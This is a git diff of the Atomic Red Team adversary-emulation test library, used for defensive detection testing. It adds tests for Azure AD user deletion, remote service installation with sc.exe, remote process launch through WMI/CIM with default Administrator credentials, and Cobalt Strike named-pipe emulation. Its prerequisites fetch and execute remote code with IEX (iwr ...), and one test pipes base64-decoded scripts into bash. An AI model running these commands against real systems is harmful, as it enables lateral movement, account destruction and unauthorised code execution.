@@ -319,7 +319,6 @@ Using Linux Base64 Encoded shell scripts that have Shebang in them. This is comm
 |------|-------------|------|---------------|
 | bash_encoded | Encoded | string | IyEvYmluL2Jhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=|
 | dash_encoded | Encoded | string | IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=|
-| zsh_encoded | Encoded | string | IyEvYmluL3pzaAplY2hvICJodHRwczovL3d3dy55b3V0dWJlLmNvbS9AYXRvbWljc29uYWZyaWRheSBGVFciCg==|
 | fish_encoded | Encoded | string | IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=|
 | sh_encoded | Encoded | string | IyEvYmluL3NoCmVjaG8gImh0dHBzOi8vd3d3LnlvdXR1YmUuY29tL0BhdG9taWNzb25hZnJpZGF5IEZUVyIK|
 

atomics/T1140/T1140.yaml

@@ -187,10 +187,6 @@ atomic_tests:
       description: Encoded #!/bin/dash script
       type: string
       default: IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
-    zsh_encoded:
-      description: Encoded #!/bin/zsh script
-      type: string
-      default: IyEvYmluL3pzaAplY2hvICJodHRwczovL3d3dy55b3V0dWJlLmNvbS9AYXRvbWljc29uYWZyaWRheSBGVFciCg==
     fish_encoded:
       description: Encoded #!/bin/fish script
       type: string
@@ -214,4 +210,4 @@ atomic_tests:
       echo #{dash_encoded} | base64 -d | bash
       echo #{fish_encoded} | base64 -d | bash
       echo #{sh_encoded} | base64 -d | bash
-      
+      

atomics/T1531/T1531.md

@@ -14,6 +14,10 @@ Adversaries who use ransomware may first perform this and other Impact behaviors
 
 - [Atomic Test #3 - Remove Account From Domain Admin Group](#atomic-test-3---remove-account-from-domain-admin-group)
 
+- [Atomic Test #4 - Azure AD - Delete user via Azure AD PowerShell](#atomic-test-4---azure-ad---delete-user-via-azure-ad-powershell)
+
+- [Atomic Test #5 - Azure AD - Delete user via Azure CLI](#atomic-test-5---azure-ad---delete-user-via-azure-cli)
+
 
 <br/>
 
@@ -143,4 +147,133 @@ Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #4 - Azure AD - Delete user via Azure AD PowerShell
+Deletes a user in Azure AD. Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (excluding changed credentials) to remove access to accounts.
+
+**Supported Platforms:** Azure-ad
+
+
+**auto_generated_guid:** 4f577511-dc1c-4045-bcb8-75d2457f01f4
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| userprincipalname | User principal name (UPN) for the Azure user being deleted | String | atomicredteam@yourdomain.com|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Connect-AzureAD
+$userprincipalname = "#{userprincipalname}"
+Remove-AzureADUser -ObjectId $userprincipalname
+```
+
+#### Cleanup Commands:
+```powershell
+N/A
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Check if AzureAD PowerShell module is installed
+##### Check Prereq Commands:
+```powershell
+Get-InstalledModule -Name AzureAD
+```
+##### Get Prereq Commands:
+```powershell
+echo "use the following to install AzureAD PowerShell module - Install-Module -Name AzureAD -Scope CurrentUser -Repository PSGallery -Force"
+```
+##### Description: Check if AzureAD PowerShell module is installed
+##### Check Prereq Commands:
+```powershell
+Update the input arguments so the userprincipalname value is accurate for your environment
+```
+##### Get Prereq Commands:
+```powershell
+echo "Update the input arguments in the .yaml file so that the userprincipalname value is accurate for your environment"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - Azure AD - Delete user via Azure CLI
+Deletes a user in Azure AD. Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (excluding changed credentials) to remove access to accounts.
+
+**Supported Platforms:** Azure-ad
+
+
+**auto_generated_guid:** c955c1c7-3145-4a22-af2d-63eea0d967f0
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| userprincipalname | User principal name (UPN) for the Azure user being deleted | String | atomicredteam@yourdomain.com|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+az login
+$userprincipalname = "#{userprincipalname}"
+az ad user delete --id $userprincipalname
+```
+
+#### Cleanup Commands:
+```powershell
+N/A
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Check if Azure CLI is installed and install manually
+##### Check Prereq Commands:
+```powershell
+az account list
+```
+##### Get Prereq Commands:
+```powershell
+echo "use the following to install the Azure CLI manually https://aka.ms/installazurecliwindows"
+```
+##### Description: Check if Azure CLI is installed and install via PowerShell
+##### Check Prereq Commands:
+```powershell
+az account list
+```
+##### Get Prereq Commands:
+```powershell
+echo "use the following to install the Azure CLI $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest -Uri https://aka.ms/installazurecliwindows -OutFile .\AzureCLI.msi; Start-Process msiexec.exe -Wait -ArgumentList '/I AzureCLI.msi /quiet'; Remove-Item .\AzureCLI.msi"
+```
+##### Description: Update the userprincipalname to meet your requirements
+##### Check Prereq Commands:
+```powershell
+Update the input arguments so the userprincipalname value is accurate for your environment
+```
+##### Get Prereq Commands:
+```powershell
+echo "Update the input arguments in the .yaml file so that the userprincipalname value is accurate for your environment"
+```
+
+
+
+
 <br/>

atomics/T1531/T1531.yaml

@@ -88,3 +88,56 @@ atomic_tests:
       }
     name: powershell
     elevation_required: false
+- name: Azure AD - Delete user via Azure AD PowerShell
+  auto_generated_guid: 4f577511-dc1c-4045-bcb8-75d2457f01f4
+  description: Deletes a user in Azure AD. Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (excluding changed credentials) to remove access to accounts.
+  supported_platforms:
+  - azure-ad
+  input_arguments:
+    userprincipalname:
+      description: User principal name (UPN) for the Azure user being deleted
+      type: String
+      default: "atomicredteam@yourdomain.com"
+  dependency_executor_name: powershell
+  dependencies:
+  - description: Check if AzureAD PowerShell module is installed
+    prereq_command: Get-InstalledModule -Name AzureAD
+    get_prereq_command: echo "use the following to install AzureAD PowerShell module - Install-Module -Name AzureAD -Scope CurrentUser -Repository PSGallery -Force"
+  - description: Check if AzureAD PowerShell module is installed
+    prereq_command: Update the input arguments so the userprincipalname value is accurate for your environment
+    get_prereq_command: echo "Update the input arguments in the .yaml file so that the userprincipalname value is accurate for your environment"
+  executor:
+    command: |-
+      Connect-AzureAD
+      $userprincipalname = "#{userprincipalname}"
+      Remove-AzureADUser -ObjectId $userprincipalname      
+    cleanup_command: N/A
+    name: powershell
+- name: Azure AD - Delete user via Azure CLI
+  auto_generated_guid: c955c1c7-3145-4a22-af2d-63eea0d967f0
+  description: Deletes a user in Azure AD. Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (excluding changed credentials) to remove access to accounts.
+  supported_platforms:
+  - azure-ad
+  input_arguments:
+    userprincipalname:
+      description: User principal name (UPN) for the Azure user being deleted
+      type: String
+      default: "atomicredteam@yourdomain.com"
+  dependency_executor_name: powershell
+  dependencies:
+  - description: Check if Azure CLI is installed and install manually
+    prereq_command: az account list
+    get_prereq_command: echo "use the following to install the Azure CLI manually https://aka.ms/installazurecliwindows"
+  - description: Check if Azure CLI is installed and install via PowerShell
+    prereq_command: az account list
+    get_prereq_command: echo "use the following to install the Azure CLI $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest -Uri https://aka.ms/installazurecliwindows -OutFile .\AzureCLI.msi; Start-Process msiexec.exe -Wait -ArgumentList '/I AzureCLI.msi /quiet'; Remove-Item .\AzureCLI.msi"
+  - description: Update the userprincipalname to meet your requirements  
+    prereq_command: Update the input arguments so the userprincipalname value is accurate for your environment
+    get_prereq_command: echo "Update the input arguments in the .yaml file so that the userprincipalname value is accurate for your environment"
+  executor:
+    command: |-
+      az login
+      $userprincipalname = "#{userprincipalname}"
+      az ad user delete --id $userprincipalname
+    cleanup_command: N/A
+    name: powershell

atomics/T1543.003/T1543.003.md

@@ -18,6 +18,8 @@ Services may be created with administrator privileges but are executed under SYS
 
 - [Atomic Test #4 - TinyTurla backdoor service w64time](#atomic-test-4---tinyturla-backdoor-service-w64time)
 
+- [Atomic Test #5 - Remote Service Installation CMD](#atomic-test-5---remote-service-installation-cmd)
+
 
 <br/>
 
@@ -213,4 +215,61 @@ reg delete "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v Servic
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #5 - Remote Service Installation CMD
+Download an executable from github and start it as a service on a remote endpoint
+Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** fb4151a2-db33-4f8c-b7f8-78ea8790f961
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| binary_path | Name of the service binary, include path. | path | PathToAtomicsFolder&#92;T1543.003&#92;bin&#92;AtomicService.exe|
+| service_type | Type of service. May be own,share,interact,kernel,filesys,rec,userown,usershare | String | Own|
+| startup_type | Service start method. May be boot,system,auto,demand,disabled,delayed-auto | String | auto|
+| service_name | Name of the Service | string | AtomicTestService_CMD|
+| remote_host | Name of the remote endpoint | string | localhost|
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+sc.exe \\#{remote_host} create #{service_name} binPath= #{binary_path} start=#{startup_type} type=#{service_type}
+sc.exe \\#{remote_host} start #{service_name}
+```
+
+#### Cleanup Commands:
+```cmd
+sc.exe \\#{remote_host} stop #{service_name} >nul 2>&1
+sc.exe \\#{remote_host} delete #{service_name} >nul 2>&1
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Service binary must exist on disk at specified location (#{binary_path})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{binary_path}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"
+```
+
+
+
+
 <br/>

atomics/T1543.003/T1543.003.yaml

@@ -128,3 +128,49 @@ atomic_tests:
       reg delete "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /f
     name: command_prompt
     elevation_required: true
+- name: Remote Service Installation CMD
+  auto_generated_guid: fb4151a2-db33-4f8c-b7f8-78ea8790f961
+  description: |
+    Download an executable from github and start it as a service on a remote endpoint
+    Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout.
+  supported_platforms:
+  - windows
+  input_arguments:
+    binary_path:
+      description: Name of the service binary, include path.
+      type: path
+      default: PathToAtomicsFolder\T1543.003\bin\AtomicService.exe
+    service_type:
+      description: Type of service. May be own,share,interact,kernel,filesys,rec,userown,usershare
+      type: String
+      default: Own
+    startup_type:
+      description: Service start method. May be boot,system,auto,demand,disabled,delayed-auto
+      type: String
+      default: auto
+    service_name:
+      description: Name of the Service
+      type: string
+      default: AtomicTestService_CMD
+    remote_host:
+      description: Name of the remote endpoint
+      type: string
+      default: localhost
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Service binary must exist on disk at specified location (#{binary_path})
+    prereq_command: |
+      if (Test-Path #{binary_path}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"
+  executor:
+    name: command_prompt
+    elevation_required: true
+    command: |
+      sc.exe \\#{remote_host} create #{service_name} binPath= #{binary_path} start=#{startup_type} type=#{service_type}
+      sc.exe \\#{remote_host} start #{service_name}
+    cleanup_command: |
+      sc.exe \\#{remote_host} stop #{service_name} >nul 2>&1
+      sc.exe \\#{remote_host} delete #{service_name} >nul 2>&1

atomics/T1546/T1546.md

@@ -14,6 +14,8 @@ Since the execution can be proxied by an account with higher permissions, such a
 
 - [Atomic Test #3 - HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation)](#atomic-test-3---hkcu---persistence-using-commandprocessor-autorun-key-without-elevation)
 
+- [Atomic Test #4 - WMI Invoke-CimMethod Start Process](#atomic-test-4---wmi-invoke-cimmethod-start-process)
+
 
 <br/>
 
@@ -142,4 +144,65 @@ Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Command Processor" -Name "Au
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #4 - WMI Invoke-CimMethod Start Process
+The following Atomic will create a New-CimSession on a remote endpoint and start a process usnig Invoke-CimMethod.
+This is a novel way to perform lateral movement or to start a remote process.
+This does require WinRM to be enabled. The account performing the run will also need to be elevated.
+A successful execution will stdout that the process started. On the remote endpoint, wmiprvse.exe will spawn the given process.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** adae83d3-0df6-45e7-b2c3-575f91584577
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| dest | destination computer name | string | localhost|
+| password | password for account | string | P@ssword1|
+| username | account to use | string | Administrator|
+| process | process to spawn | string | calc.exe|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+# Set the remote computer name and credentials
+ $RemoteComputer = "#{dest}"
+ $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+ $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+
+ # Create a CIM session
+ $CimSession = New-CimSession -ComputerName $RemoteComputer -Credential $Credential
+
+ # Define the process you want to start
+ $ProcessToStart = "#{process}"
+
+ # Invoke the Create method on the Win32_Process class to start the process
+ $Result = Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $ProcessToStart}
+
+ # Check the result
+ if ($Result.ReturnValue -eq 0) {
+     Write-Host "Process started successfully with Process ID: $($Result.ProcessId)"
+ } else {
+     Write-Host "Failed to start the process. Error code: $($Result.ReturnValue)"
+ }
+
+ # Clean up the CIM session
+ Remove-CimSession -CimSession $CimSession
+```
+
+
+
+
+
+
 <br/>

atomics/T1546/T1546.yaml

@@ -67,3 +67,58 @@ atomic_tests:
     cleanup_command: |-
       Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Command Processor" -Name "AutoRun" -ErrorAction Ignore
     name: powershell
+
+- name: WMI Invoke-CimMethod Start Process
+  auto_generated_guid: adae83d3-0df6-45e7-b2c3-575f91584577
+  description: |
+    The following Atomic will create a New-CimSession on a remote endpoint and start a process usnig Invoke-CimMethod.
+    This is a novel way to perform lateral movement or to start a remote process.
+    This does require WinRM to be enabled. The account performing the run will also need to be elevated.
+    A successful execution will stdout that the process started. On the remote endpoint, wmiprvse.exe will spawn the given process.
+  supported_platforms:
+  - windows
+  input_arguments:
+    dest:
+      description: destination computer name
+      type: string
+      default: localhost
+    password:
+      description: password for account
+      type: string
+      default: P@ssword1
+    username:
+      description: account to use
+      type: string
+      default: Administrator
+    process:
+      description: process to spawn
+      type: string
+      default: calc.exe
+  executor:
+    name: powershell
+    elevation_required: true
+    command: |
+       # Set the remote computer name and credentials
+        $RemoteComputer = "#{dest}"
+        $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+        $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+
+        # Create a CIM session
+        $CimSession = New-CimSession -ComputerName $RemoteComputer -Credential $Credential
+
+        # Define the process you want to start
+        $ProcessToStart = "#{process}"
+
+        # Invoke the Create method on the Win32_Process class to start the process
+        $Result = Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $ProcessToStart}
+
+        # Check the result
+        if ($Result.ReturnValue -eq 0) {
+            Write-Host "Process started successfully with Process ID: $($Result.ProcessId)"
+        } else {
+            Write-Host "Failed to start the process. Error code: $($Result.ReturnValue)"
+        }
+
+        # Clean up the CIM session
+        Remove-CimSession -CimSession $CimSession 
+

atomics/T1559/T1559.md

@@ -0,0 +1,244 @@
+# T1559 - Inter-Process Communication
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1559)
+<blockquote>Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. 
+
+Adversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Linux environments support several different IPC mechanisms, two of which being sockets and pipes.(Citation: Linux IPC) Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms. Adversaries may also use [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) to facilitate remote IPC execution.(Citation: Fireeye Hunting COM June 2019)</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Cobalt Strike Artifact Kit pipe](#atomic-test-1---cobalt-strike-artifact-kit-pipe)
+
+- [Atomic Test #2 - Cobalt Strike Lateral Movement (psexec_psh) pipe](#atomic-test-2---cobalt-strike-lateral-movement-psexec_psh-pipe)
+
+- [Atomic Test #3 - Cobalt Strike SSH (postex_ssh) pipe](#atomic-test-3---cobalt-strike-ssh-postex_ssh-pipe)
+
+- [Atomic Test #4 - Cobalt Strike post-exploitation pipe (4.2 and later)](#atomic-test-4---cobalt-strike-post-exploitation-pipe-42-and-later)
+
+- [Atomic Test #5 - Cobalt Strike post-exploitation pipe (before 4.2)](#atomic-test-5---cobalt-strike-post-exploitation-pipe-before-42)
+
+
+<br/>
+
+## Atomic Test #1 - Cobalt Strike Artifact Kit pipe
+Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** bd13b9fc-b758-496a-b81a-397462f82c72
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 1
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Named pipe executors must exist on disk
+##### Check Prereq Commands:
+```powershell
+if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+$zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - Cobalt Strike Lateral Movement (psexec_psh) pipe
+Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 830c8b6c-7a70-4f40-b975-8bbe74558acd
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 2
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Named pipe executors must exist on disk
+##### Check Prereq Commands:
+```powershell
+if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+$zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - Cobalt Strike SSH (postex_ssh) pipe
+Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 3
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Named pipe executors must exist on disk
+##### Check Prereq Commands:
+```powershell
+if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+$zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #4 - Cobalt Strike post-exploitation pipe (4.2 and later)
+Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 7a48f482-246f-4aeb-9837-21c271ebf244
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 4
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Named pipe executors must exist on disk
+##### Check Prereq Commands:
+```powershell
+if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+$zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - Cobalt Strike post-exploitation pipe (before 4.2)
+Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 8dbfc15c-527b-4ab0-a272-019f469d367f
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 5
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Named pipe executors must exist on disk
+##### Check Prereq Commands:
+```powershell
+if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+$zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+```
+
+
+
+
+<br/>

atomics/T1559/T1559.yaml

@@ -0,0 +1,123 @@
+attack_technique: T1559
+display_name: Inter-Process Communication
+atomic_tests:
+
+- name: Cobalt Strike Artifact Kit pipe
+  auto_generated_guid: bd13b9fc-b758-496a-b81a-397462f82c72
+  description: |
+    Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+    
+    The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+  supported_platforms:
+  - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Named pipe executors must exist on disk
+    prereq_command: |
+      if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1}
+    get_prereq_command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+      $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+      Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+  executor:
+    command: |
+      "PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 1
+    name: command_prompt
+    
+- name: Cobalt Strike Lateral Movement (psexec_psh) pipe
+  auto_generated_guid: 830c8b6c-7a70-4f40-b975-8bbe74558acd
+  description: |
+    Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+    
+    The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+  supported_platforms:
+  - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Named pipe executors must exist on disk
+    prereq_command: |
+      if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1}
+    get_prereq_command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+      $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
